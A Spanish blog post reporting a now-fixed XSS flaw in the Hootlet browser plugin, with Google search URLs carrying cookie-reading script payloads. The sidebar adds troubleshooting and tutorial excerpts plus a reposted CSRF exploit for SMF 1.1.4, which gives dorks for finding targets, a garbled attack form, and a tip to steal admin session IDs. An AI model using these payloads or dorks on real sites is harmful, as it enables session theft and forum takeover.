Ir al contenido principal

#XSS en Hootlet (herramienta de Hootsuite (y ya está arreglado :P))

Hace tiempo instalé Hootlet, una herramienta (plugin para navegadores) de Hootsuite, como ustedes saben Hootsuite es una "suite" de ayuda para CM (Community Managers), en la cual puedes manejar distintas redes sociales y también diferentes perfiles.

En palabras de ellos mismos:

Hootsuite && Hootlet:

"We are not just a social relationship platform. We are not just a tech company. We are creators, innovators, and builders dedicated to revolutionizing the way you communicate."

Ambas son excelente en la ayuda que brindan, salvo por un pequeño problema que tenían (lo básico si lo arreglaron, no he revisado más), un simple xss, pero que funcionaba en casi cualquier sitio de búsquedas.

Esto quiere decir, si yo buscaba en google un xss, Google lo busca tal y como es, un simple texto, pero hootlet lo interpretaba como un xss, por lo que si yo le daba ese enlace a una persona con Hootlet instalado en su navegador, el veía un xss "en la página de google".

O sea, que si hacía una búsqueda de este tipo:

https://www.google.com.mx/?gws_rd=cr&ei=Q8WCUtuUL_Ly2gXGu4CgBQ#q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

https://www.google.com.mx/?gws_rd=cr&ei=Q8WCUtuUL_Ly2gXGu4CgBQ#q=%3Ch1%3Easd%3C%2Fh1%3E

Me ejecutaba el xss.





Esto ya está reportado y arreglado, como lo mencioné arriba, no busqué más, pero podría haber alguna otra cosa útil :P

Hootlet está ligado a las cuentas que tienes en Hootsuite, por lo tanto, solo imaginen que se podía hacer con esto.

Cabe aclarar que la respuesta y atención por parte de Michael Tippett y Chris Noble en Hootsuite fue casi inmediata y muy amable, saludos a los dos! :D

PD por si alguien de Hootsuite o Hootlet lo lee:
Me quedé esperando mi nombre en el "Hall of fame" que prometieron :(

PS if anyone Hootsuite or Hootlet reads:
I kept waiting for my name in the "Hall of fame" promised :(

Saludos! :D

Komtec1

Comentarios

Entradas populares de este blog

Solución [fix] a hamachi Logging in .. failed, busy

Hola!

Aquí con una pequeña entrada, pero que a más de uno le será útil.

Tengo hamachi instalado en varias máquinas, pero en una precisamente al reiniciar, algunas veces me da este problema:

usuarioserver@server:~$ sudo hamachi login
[sudo] password for usuarioserver:
Logging in .. failed, busy

Lo busqué en internet y la "solución" que dan, es reinstalar hamachi, y para los que han instalado hamachi en ubuntu, saben que no es una opción, pues se tendrían que hacer estos pasos: 
sudo apt-get remove logmein-hamachi sudo dpkg -i logmein-hamachixxx.deb sudo apt-get install -f
Para lo cual (siempre) es molesto hacer esos pasos, y algunas veces la configuración se llega a perder. 
Para solucionar ese problema, basta con hacer un: 
sudo /etc/init.d/logmein-hamachi force-reload
Esto forzará el reinicio de hamachi, y así después hacen: 
sudo hamachi login
Y listo, el problema de failed busy desaparece y los deja loguear bien en la red de hamachi. 
Espero les sirva! :D 
Saludos 
Komtec…

Integrar API de Google Maps, archivos kml, kmz y otras fumarolas :D

Ya que andamos en eso de la posteada ahora les voy a dejar un pequeño manual sobre como integrar la API de maps (google) dentro de nuestro código, hay varia documentación en la página developers de google, pero realmente lo que uno busca cuando pone en google: "integrar api de maps" es ver un ejemplo claro y directo para que se pueda entender de mejor forma.

Así que pues ya comentada la información de arriba les paso a dejar un ejemplo.

Lo primero que tenemos que poner en nuestro código es la llamada a la API de maps:


<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?sensor=false&language=es"></script>En este caso la variable sensor está en false, esto nos indica que no hay un dispositivo gps que pueda tomar la ubicación (se pone generalmente en true cuando es para aplicación movil, llámese celular o tableta)El lenguaje declaramos español, esto es para los menús que se van a mostrar en el mapa. Una vez que tenemo…

SMF 1.1.4 - Add User In Group [CSRF]

Bueno en primera este post lo saque de remoteexecution.es el link es este:

http://www.remoteexecution.es/foro/index.php?topic=879

Dork: "SMF 1.1.4"
Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4"


< h t m l >
< h e a d >
< b o d y >
< action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>

o si no tambien se puede usar

forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid
by Syntacks!

Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc ..)

|| …